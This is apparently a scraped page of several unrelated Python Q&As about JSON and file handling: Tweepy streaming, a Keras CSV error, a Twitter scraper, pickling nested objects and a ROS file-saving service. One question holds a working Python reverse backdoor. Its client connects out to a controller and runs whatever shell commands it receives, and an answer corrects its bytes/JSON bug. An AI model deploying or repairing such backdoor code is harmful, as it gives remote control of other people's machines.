Does "IOError: [Errno 2] No such file or directory" mean the file hasn't been written? (json)

I'm using Tweepy for the first time and am currently getting this error:
---------------------------------------------------------------------------
IOError Traceback (most recent call last)
<ipython-input-11-cdd7ebe0c00f> in <module>()
----> 1 data_json = io.open('raw_tweets.json', mode='r', encoding='utf-8').read() #reads in the JSON file
2 data_python = json.loads(data_json)
3
4 csv_out = io.open('tweets_out_utf8.csv', mode='w', encoding='utf-8') #opens csv file
IOError: [Errno 2] No such file or directory: 'raw_tweets.json'
I have a feeling the code I've written isn't working: for example, print(status) doesn't print anything, and I see no saved CSV or JSON file in the directory.
I'm a newbie, so any help/documentation you can offer would be great!
import time
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import os
import json
import csv
import io
from pymongo import MongoClient

ckey = 'blah'
consumer_secret = 'blah'
access_token_key = 'blah'
access_token_secret = 'blah'

#start_time = time.time() #grabs the system time
keyword_list = ['keyword'] #track list

#Listener Class Override
class listener(StreamListener):

    def __init__(self, start_time, time_limit=60):
        self.time = start_time
        self.limit = time_limit
        self.tweet_data = []

    def on_data(self, data):
        saveFile = io.open('raw_tweets.json', 'a', encoding='utf-8')
        while (time.time() - self.time) < self.limit:
            try:
                self.tweet_data.append(data)
                return True
            except BaseException, e:
                print 'failed ondata,', str(e)
                time.sleep(5)
                pass
        saveFile = io.open('raw_tweets.json', 'w', encoding='utf-8')
        saveFile.write(u'[\n')
        saveFile.write(','.join(self.tweet_data))
        saveFile.write(u'\n]')
        saveFile.close()
        exit()

    def on_error(self, status):
        print status

class listener(StreamListener):

    def __init__(self, start_time, time_limit=10):
        self.time = start_time
        self.limit = time_limit

    def on_data(self, data):
        while (time.time() - self.time) < self.limit:
            print(data)
            try:
                client = MongoClient('blah', 27017)
                db = client['blah']
                collection = db['blah']
                tweet = json.loads(data)
                collection.insert(tweet)
                return True
            except BaseException as e:
                print('failed ondata,')
                print(str(e))
                time.sleep(5)
                pass
        exit()

    def on_error(self, status):
        print(status)

data_json = io.open('raw_tweets.json', mode='r', encoding='utf-8').read() #reads in the JSON file
data_python = json.loads(data_json)

csv_out = io.open('tweets_out_utf8.csv', mode='w', encoding='utf-8') #opens csv file
UPDATE: the code below creates the file, but the file is empty.
import tweepy
import datetime

auth = tweepy.OAuthHandler('xxx', 'xxx')
auth.set_access_token('xxx', 'xxx')

class listener(tweepy.StreamListener):

    def __init__(self, timeout, file_name, *args, **kwargs):
        super(listener, self).__init__(*args, **kwargs)
        self.start_time = None
        self.timeout = timeout
        self.file_name = file_name
        self.tweet_data = []

    def on_data(self, data):
        if self.start_time is None:
            self.start_time = datetime.datetime.now()
        while (datetime.datetime.now() - self.start_time).seconds < self.timeout:
            with open(self.file_name, 'a') as data_file:
                data_file.write('\n')
                data_file.write(data)

    def on_error(self, status):
        print status

l = listener(60, 'stack_raw_tweets.json')
mstream = tweepy.Stream(auth=auth, listener=l)
mstream.filter(track=['python'], async=True)

You are not creating a Stream for the listener; the second-to-last line of the code below does that, and the last line then starts the Stream. I must warn you that storing this in MongoDB would be the right thing to do, as the file I am storing grows easily to several GB. Also, the file is not exactly JSON: each line in the file is a JSON document. You must tweak it to your needs.
import tweepy
import datetime

auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)

class listener(tweepy.StreamListener):

    def __init__(self, timeout, file_name, *args, **kwargs):
        super(listener, self).__init__(*args, **kwargs)
        self.start_time = None
        self.timeout = timeout
        self.file_name = file_name
        self.tweet_data = []

    def on_data(self, data):
        if self.start_time is None:
            self.start_time = datetime.datetime.now()
        while (datetime.datetime.now() - self.start_time).seconds < self.timeout:
            with open(self.file_name, 'a') as data_file:
                data_file.write('\n')
                data_file.write(data)

    def on_error(self, status):
        print status

l = listener(60, 'raw_tweets.json')
mstream = tweepy.Stream(auth=auth, listener=l)
mstream.filter(track=['python'], async=True)
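Since each line of the resulting file is its own JSON document, here is a minimal sketch of reading it back, assuming the same file name as above:

import json

def read_tweets(file_name):
    # Read a file that contains one JSON document per line.
    tweets = []
    with open(file_name) as data_file:
        for line in data_file:
            line = line.strip()
            if line:  # skip blank separator lines
                tweets.append(json.loads(line))
    return tweets

tweets = read_tweets('raw_tweets.json')
print(len(tweets))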

Related

I get the error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor against my real computer

I have Python 2 on my VM, and my code is as follows:
#!/usr/bin/env python
import socket, json

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connection")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        return self.reliable_recieve()

    def run(self):
        while True:
            command = raw_input(">> ")
            result = self.execute_remotely(command)
            print(result)

my_listener = Listener("ip address", 4444)
my_listener.run()
My target computer has Python 3, and the code is as follows:
#!/usr/bin/env python
import socket, subprocess
import json

class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_recieve()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result)
        connection.close()

my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this, I get the error mentioned in the subject. I have tried to decode json_data with the utf-8 argument, but the problem persists.
The listener is working in my VM, but on my real PC it shows this error.
And if I decode my json_data, it shows the error "Object of type bytes is not JSON serializable".
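No answer is recorded here, but a hedged guess at the cause: on Python 3, subprocess.check_output() returns bytes, which json.dumps() cannot serialize, and sockets send and receive bytes rather than str. A minimal sketch of the Python 3 side with explicit encoding and decoding (function names mirror the question's code, but these are free functions taking the socket as a parameter):

import json, subprocess

def execute_system_command(command):
    # check_output returns bytes on Python 3; decode before JSON-encoding
    return subprocess.check_output(command, shell=True).decode('utf-8', errors='replace')

def reliable_send(connection, data):
    json_data = json.dumps(data)
    connection.send(json_data.encode('utf-8'))  # sockets want bytes on Python 3

def reliable_recieve(connection):
    json_data = b""
    while True:
        try:
            json_data = json_data + connection.recv(1024)  # recv returns bytes
            return json.loads(json_data.decode('utf-8'))
        except ValueError:
            continue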

Why does Keras not take my data from the CSV?

I am following the tutorial about importing CSV data into TensorFlow.
I followed every step; however, it does not work out.
It says that one of my features is not in the dictionary.
If so, how can I put it into the dictionary?
The link to my colab
The code is written below, and the error information is at the end.
import functools
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds

train_file_path = "/content/Productivity training.csv"
test_file_path = "/content/Productivity Testing.csv"

LABEL_COLUMN = 'Productivity'

def get_dataset(file_path):
    dataset = tf.data.experimental.make_csv_dataset(
        file_path,
        batch_size=12,
        label_name=LABEL_COLUMN,
        na_value="?",
        num_epochs=1,
        ignore_errors=True)
    return dataset

raw_train_data = get_dataset(train_file_path)
raw_test_data = get_dataset(test_file_path)

examples, labels = next(iter(raw_train_data))  # first batch
print("EXAMPLES: \n", examples, "\n")
print("LABELS: \n", labels)

CATEGORIES = {
    'over working hours': ['0', '2'],
    'experience': ['0.5', '0.75', '1'],
    'absent': ['0.5', '0.25', '0']
}

categorical_columns = []
for feature, vocab in CATEGORIES.items():
    cat_col = tf.feature_column.categorical_column_with_vocabulary_list(
        key=feature, vocabulary_list=vocab)
    categorical_columns.append(tf.feature_column.indicator_column(cat_col))

def process_continuous_data(mean, data):
    # standardize the data
    data = tf.cast(data, tf.float32) * 1/(2*mean)
    return tf.reshape(data, [-1, 1])

MEANS = {
    'Weekday': 4,
    'highest': 9.2540,
    'lowest': 3.47,
    'Weather': 2.63,
    'Wind speed': 2.31
}

numerical_columns = []
for feature in MEANS.keys():
    num_col = tf.feature_column.numeric_column(
        feature, normalizer_fn=functools.partial(process_continuous_data, MEANS[feature]))
    numerical_columns.append(num_col)

preprocessing_layer = tf.keras.layers.DenseFeatures(categorical_columns + numerical_columns)

model = tf.keras.Sequential([
    preprocessing_layer,
    tf.keras.layers.Dense(128, activation='relu'),
    tf.keras.layers.Dense(128, activation='relu'),
    tf.keras.layers.Dense(1, activation='sigmoid'),
])

model.compile(
    loss='binary_crossentropy',
    optimizer='adam',
    metrics=['accuracy'])

train_data = raw_train_data
test_data = raw_test_data

model.fit(train_data, epochs=20)
Here is the error info:
/usr/local/lib/python3.7/dist-packages/tensorflow/python/framework/func_graph.py in wrapper(*args, **kwargs)
975 except Exception as e: # pylint:disable=broad-except
976 if hasattr(e, "ag_error_metadata"):
--> 977 raise e.ag_error_metadata.to_exception(e)
978 else:
979 raise
ValueError: in user code:
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:805 train_function *
return step_function(self, iterator)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:795 step_function **
outputs = model.distribute_strategy.run(run_step, args=(data,))
/usr/local/lib/python3.7/dist-packages/tensorflow/python/distribute/distribute_lib.py:1259 run
return self._extended.call_for_each_replica(fn, args=args, kwargs=kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/distribute/distribute_lib.py:2730 call_for_each_replica
return self._call_for_each_replica(fn, args, kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/distribute/distribute_lib.py:3417 _call_for_each_replica
return fn(*args, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:788 run_step **
outputs = model.train_step(data)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/training.py:754 train_step
y_pred = self(x, training=True)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/base_layer.py:1012 __call__
outputs = call_fn(inputs, *args, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/sequential.py:389 call
outputs = layer(inputs, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/engine/base_layer.py:1012 __call__
outputs = call_fn(inputs, *args, **kwargs)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/keras/feature_column/dense_features.py:169 call **
self._state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2592 get_dense_tensor
return transformation_cache.get(self, state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2355 get
transformed = column.transform_feature(self, state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2564 transform_feature
input_tensor = transformation_cache.get(self.key, state_manager)
/usr/local/lib/python3.7/dist-packages/tensorflow/python/feature_column/feature_column_v2.py:2339 get
raise ValueError('Feature {} is not in features dictionary.'.format(key))
ValueError: Feature Weather is not in features dictionary.
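No answer is recorded here, but as a hedged debugging step: this error usually means a key used in MEANS or CATEGORIES ('Weather') does not exactly match a column header in the CSV file; casing and stray whitespace are common culprits. One quick check is to print the feature names one batch actually yields and compare them with the keys the code uses:

# Compare the column names the dataset yields with the keys used above
examples, labels = next(iter(raw_train_data))
print(sorted(examples.keys()))
print(sorted(list(CATEGORIES) + list(MEANS)))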

BeautifulSoup find method returns a non-subscriptable object

I was trying to create a Twitter scraper using beautifulsoup, requests, and json. However, when I tried to run the code, it raised the error 'NoneType' object is not subscriptable. I checked the lines where the error is located, but I couldn't find what raises it. Can someone please help? I couldn't fix it.
File "tweetscraper.py", line 131, in <module>
start()
File "tweetscraper.py", line 125, in start
tweets = get_tweets_data(username, soup)
File "tweetscraper.py", line 54, in get_tweets_data
next_pointer = soup.find("div", {"class": "stream-container"})["data-min-position"]
TypeError: 'NoneType' object is not subscriptable
Here is my code:
import sys
import json
import requests
from bs4 import BeautifulSoup

def get_tweet_text(tweet):
    tweet_text_box = tweet.find("p", {"class": "TweetTextSize TweetTextSize--normal js-tweet-text tweet-text"})
    images_in_tweet_tag = tweet_text_box.find_all("a", {"class": "twitter-timeline-link u-hidden"})
    tweet_text = tweet_text_box.text
    for image_in_tweet_tag in images_in_tweet_tag:
        tweet_text = tweet_text.replace(image_in_tweet_tag.text, '')
    return tweet_text

def get_this_page_tweets(soup):
    tweets_list = list()
    tweets = soup.find_all("li", {"data-item-type": "tweet"})
    for tweet in tweets:
        tweet_data = None
        try:
            tweet_data = get_tweet_text(tweet)
        except Exception as e:
            # ignore if there is any loading or tweet error
            continue
        if tweet_data:
            tweets_list.append(tweet_data)
            print(".", end="")
            sys.stdout.flush()
    return tweets_list

def get_tweets_data(username, soup):
    tweets_list = list()
    tweets_list.extend(get_this_page_tweets(soup))

    next_pointer = soup.find("div", {"class": "stream-container"})["data-min-position"]

    while True:
        next_url = "https://twitter.com/i/profiles/show/" + username + \
                   "/timeline/tweets?include_available_features=1&" \
                   "include_entities=1&max_position=" + next_pointer + "&reset_error_state=false"

        next_response = None
        try:
            next_response = requests.get(next_url)
        except Exception as e:
            # in case there is some issue with the request. None encountered so far.
            print(e)
            return tweets_list

        tweets_data = next_response.text
        tweets_obj = json.loads(tweets_data)
        if not tweets_obj["has_more_items"] and not tweets_obj["min_position"]:
            # using two checks here because in one case has_more_items was false but there were more items
            print("\nNo more tweets returned")
            break
        next_pointer = tweets_obj["min_position"]
        html = tweets_obj["items_html"]
        soup = BeautifulSoup(html, 'lxml')
        tweets_list.extend(get_this_page_tweets(soup))

    return tweets_list

# dump final result in a json file
def dump_data(username, tweets):
    filename = username + "_twitter.json"
    print("\nDumping data in file " + filename)
    data = dict()
    data["tweets"] = tweets
    with open(filename, 'w') as fh:
        fh.write(json.dumps(data))
    return filename

def get_username():
    # if username is not passed
    if len(sys.argv) < 2:
        usage()
    username = sys.argv[1].strip().lower()
    if not username:
        usage()
    return username

def start(username=None):
    username = get_username()
    url = "http://www.twitter.com/" + username
    print("\n\nDownloading tweets for " + username)
    response = None
    try:
        response = requests.get(url)
    except Exception as e:
        print(repr(e))
        sys.exit(1)

    if response.status_code != 200:
        print("Non success status code returned " + str(response.status_code))
        sys.exit(1)

    soup = BeautifulSoup(response.text, 'lxml')

    if soup.find("div", {"class": "errorpage-topbar"}):
        print("\n\n Error: Invalid username.")
        sys.exit(1)

    tweets = get_tweets_data(username, soup)

    # dump data in a text file
    dump_data(username, tweets)

    print(str(len(tweets)) + " tweets dumped.")

start()
The method find() returns only the first element that matches, as a single object, or None when nothing matches, and None is not subscriptable. The method find_all(), by contrast, returns all the occurrences that match the specified condition as a (possibly empty) list, which is subscriptable.
Find out more about this in the Beautiful Soup documentation.
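A minimal sketch of guarding against the None case before indexing (same selector as the question's code):

container = soup.find("div", {"class": "stream-container"})
if container is None:
    # Nothing matched: Twitter may have changed its markup,
    # or the page is not the expected timeline HTML.
    raise RuntimeError("stream-container div not found")
next_pointer = container["data-min-position"]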

Save Nested Objects to File in Python3

How can I save this structure of Python objects into a file (preferably JSON)? And how can I load this structure from the file again?
class Nested(object):
    def __init__(self, n):
        self.name = "Nested Object: " + str(n)
        self.state = 3.14159265359

class Nest(object):
    def __init__(self):
        self.x = 1
        self.y = 2
        self.objects = []

tree = []
tree.append(Nest())
tree.append(Nest())
tree.append(Nest())
tree[0].objects.append(Nested(1))
tree[0].objects.append(Nested(2))
tree[1].objects.append(Nested(1))
tree[2].objects.append(Nested(7))
tree[2].objects.append(Nested(8))
tree[2].objects.append(Nested(9))
Thanks to the reference to pickle, I found a very simple, well-working solution to save my array of objects:
pickle

import pickle

pickle.dump(tree, open("save.p", "wb"))
loaded_objects = pickle.load(open("save.p", "rb"))

jsonpickle

import jsonpickle

frozen = jsonpickle.encode(tree)
with open("save.json", "w") as text_file:
    print(frozen, file=text_file)

file = open("save.json", "r")
loaded_objects = jsonpickle.decode(file.read())
If you don't want pickle, nor want to use an external library, you can always do it the hard way:

import json

class NestEncoder(json.JSONEncoder):
    def default(self, obj):
        entry = dict(obj.__dict__)
        entry['__class__'] = obj.__class__.__name__
        return entry

class NestDecoder(json.JSONDecoder):
    def __init__(self):
        json.JSONDecoder.__init__(self, object_hook=self.dict_to_object)

    def dict_to_object(self, dictionary):
        if dictionary.get("__class__") == "Nested":
            obj = Nested.__new__(Nested)
        elif dictionary.get("__class__") == "Nest":
            obj = Nest.__new__(Nest)
        else:
            return dictionary

        for key, value in dictionary.items():
            if key != '__class__':
                setattr(obj, key, value)
        return obj

with open('nest.json', 'w') as file:
    json.dump(tree, file, cls=NestEncoder)

with open('nest.json', 'r') as file:
    tree2 = json.load(file, cls=NestDecoder)

print("Smoke test:")
print(tree[0].objects[0].name)
print(tree2[0].objects[0].name)

Assigning the attributes to the classes doesn't have to be done dynamically with setattr(); you can also do it manually.
There are probably plenty of pitfalls with doing it like this, so be careful.
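One concrete pitfall, as a hedged example: the encoder only copies __dict__, so an attribute value that is itself not JSON-serializable and has no __dict__ of its own (a datetime, say) will still make the dump fail:

import datetime

nest = Nest()
nest.created = datetime.datetime.now()  # not JSON-serializable, and has no __dict__
try:
    json.dumps(nest, cls=NestEncoder)
except (TypeError, AttributeError) as e:
    print("Encoding failed:", e)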

ROS service failed to save files

I want a service 'save_readings' that automatically saves data from a rostopic into a file, but each time the service gets called, it doesn't save any file.
I've tried running the file-saving code in Python without using a rosservice, and it works fine.
I don't understand why this is happening.
#!/usr/bin/env python
# license removed for brevity
import rospy, numpy
from std_msgs.msg import String, Int32MultiArray, Float32MultiArray, Bool
from std_srvs.srv import Empty, EmptyResponse
import geometry_msgs.msg
from geometry_msgs.msg import WrenchStamped
import json
# import settings

pos_record = []
wrench_record = []

def ftmsg2listandflip(ftmsg):
    return [ftmsg.wrench.force.x, ftmsg.wrench.force.y, ftmsg.wrench.force.z,
            ftmsg.wrench.torque.x, ftmsg.wrench.torque.y, ftmsg.wrench.torque.z]

def callback_pos(data):
    global pos_record
    pos_record.append(data.data)

def callback_wrench(data):
    global wrench_record
    ft = ftmsg2listandflip(data)
    wrench_record.append([data.header.stamp.to_sec()] + ft)

def exp_listener():
    stop_sign = False
    rospy.Subscriber("stage_pos", Float32MultiArray, callback_pos)
    rospy.Subscriber("netft_data", WrenchStamped, callback_wrench)
    rospy.spin()

def start_read(req):
    global pos_record
    global wrench_record
    pos_record = []
    wrench_record = []
    return EmptyResponse()

def save_readings(req):
    global pos_record
    global wrench_record
    filename = rospy.get_param('save_file_name')
    output_data = {'pos_list': pos_record, 'wrench_list': wrench_record}
    rospy.loginfo("output_data %s", output_data)
    with open(filename, 'w') as outfile:  # write data to 'data.json'
        print('dumping json file')
        json.dump(output_data, outfile)  # TODO: find out why failing to save the file.
    outfile.close()
    print("file saved")
    rospy.sleep(2)
    return EmptyResponse()

if __name__ == '__main__':
    try:
        rospy.init_node('lisener_node', log_level=rospy.INFO)
        s_1 = rospy.Service('start_read', Empty, start_read)
        s_1 = rospy.Service('save_readings', Empty, save_readings)
        exp_listener()
        print('mylistener ready!')
    except rospy.ROSInterruptException:
        pass
Got it. I need to specify a path for the file to be saved.
save_path = '/home/user/catkin_ws/src/motionstage/'
filename = save_path + filename
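A hedged note on why this happens: ROS nodes started via roslaunch typically run with their working directory set to $ROS_HOME (usually ~/.ros), so a relative filename lands there rather than in the package directory. Building an absolute path, e.g. with os.path.join, avoids the surprise (the path below is the one from the answer):

import os

save_path = '/home/user/catkin_ws/src/motionstage/'
filename = os.path.join(save_path, rospy.get_param('save_file_name'))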